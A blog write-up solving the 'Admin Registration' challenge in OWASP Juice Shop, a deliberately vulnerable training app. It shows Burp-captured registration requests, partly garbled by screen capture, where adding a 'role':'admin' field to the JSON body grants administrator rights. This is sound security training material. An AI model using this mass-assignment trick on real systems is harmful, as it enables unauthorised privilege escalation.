Pwning OWASP’s Juice Shop Pt. 22: Admin Registration

Challenge: 

Name: Admin Registration

Description: Register as a user with administrator privileges.

Difficulty: 3 star

Category: Improper Input Validation

Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html

Tools used:

Burp, FoxyProxy

Resources used:

Admin Section

Methodology: 

In the expanded description, it’s recommended that I try registering as an ordinary user to see what API endpoints are involved, then to “Think of the simplest possible implementations of a distinction between regular users and administrators”.

After setting up Burp Suite and FoxyProxy, then filling in the new user registration form, this is the packet that is sent to the server.

Dashboard Target 
Intruder Repeater 
Sequencer 
HIT P history WebSockets history Options 
Request to http://localhost:3000 
[12700 
1] 
Param s Headers 
Raw Actions 
1 POST ,'api/Users/ HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, * / * 
4 Accept 
S Accept -Language: en-US, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 273 
Origin: http://localhost : 3000 
10 Connection: close 
Referer: http• 
// I Ocal host 3000/ 
rv.78.o) 
Decoder 
Gecko,'201001 
12 Cookle: language=en; welcomebanner status=dismiss; 
14 { 
email " "test3@test . com' , 
password 
" "test 1234" , 
passwordRepeat 
" "test 1234" , 
securityQuestion" 
cookieconsent 
"icl" : I 
question 
createdAt' 
'updatedAt' 
'Your eldest siblings middle name?' , 
2020-11- 02T17: 22: 49. 988Z" , 
2020-11- 02T17: 22: 49 988Z" 
securityAnswer" "Ferdinand Cunningham ill"

Fortunately, thanks to the user authentication details I gathered during the Admin Section challenge, I have a JSON document containing all of the database fields this form can populate.

"data": 
"createdAt": " 
"deletedAt" • 
. null, 
"deluxeToken" . 
"email": "adminö)juice-sh.op" 
"id": 
"isActive": 
true, 
"lastLoginIp" : 
"undefined" , 
"password 
"profilelmage": "assets/public/images/uploads/default.svg" , 
"admin", 
"role" : 
" JSUZ11NiJ9. eyJzdGF0dXMi0iJzdW 
"token" . 
"totpSecret": " " , 
"updatedAt": " 
"username" : 
"createdAt": " 
"deletedAt" • 
. null, 
"deluxeToken" . 
"email": "jinnjuice-sh.op" 
"id": 
"isActive": 
true, 
"lastLoginIp" : 
"password 
"profilelmage": "assets/public/images/uploads/default.svg" , 
"role": "customer" 
"totpSecret": " " , 
"updatedAt": " 
"username":

Looking at the differences between the admin account and Jim’s account, it’s plain to see that the “role” field is the simplest way to differentiate between customer accounts and administrator accounts, so adding a “role” field to the outgoing registration packet identifying this user as an administrator may be sufficient to complete this challenge.

Dashboard Target 
Intruder Repeater 
Sequencer 
HIT P history WebSockets history Options 
Request to http://localhost:3000 
[127 001] 
Para ms Headers 
Pretty 
Raw Actions 
POST /api/Users/ HI-rp/l.l 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
Accept 
Accept -Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
Content -Type: application/ j son 
Content -Length: 273 
Origin: http://localhost : 3000 
Connection: close 
Referer: http://localhost : 3000/ 
rv.78.o) 
12 
14 
Cookie: language=en; welcomebanner status=dismiss; 
email " "test3@test . com' , 
password 
" "test 1234" , 
passwordRepeat 
" "test 1234" , 
'role 
'admin", 
securityQuestion" 
"icl" : I 
question 
createdAt' 
'updatedAt' 
'Your eldest siblings middle name?' , 
2020-11- 02T17: 22: 49. 988Z" , 
2020-11- 02T17: 22: 49 988Z" 
securityAnswer" "Ferdinand Cunningham Ill"
You successfully solved a challenge: Admin Registration (Register as a user with administrator privileges.) X

Prevention and mitigation strategies:

OWASP Mitigation Cheat Sheet 

Lessons Learned and Things Worth Mentioning: 

  1. This is a perfect example of using previously gathered information to help craft an entirely new attack. Having the user authentication details saved from the Admin Section challenge made completing this challenge far faster and simpler. This is why I always take time in challenges to gather any extra data I come across and save it in a specific directory for future reference. You never know when stuff will come in handy.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s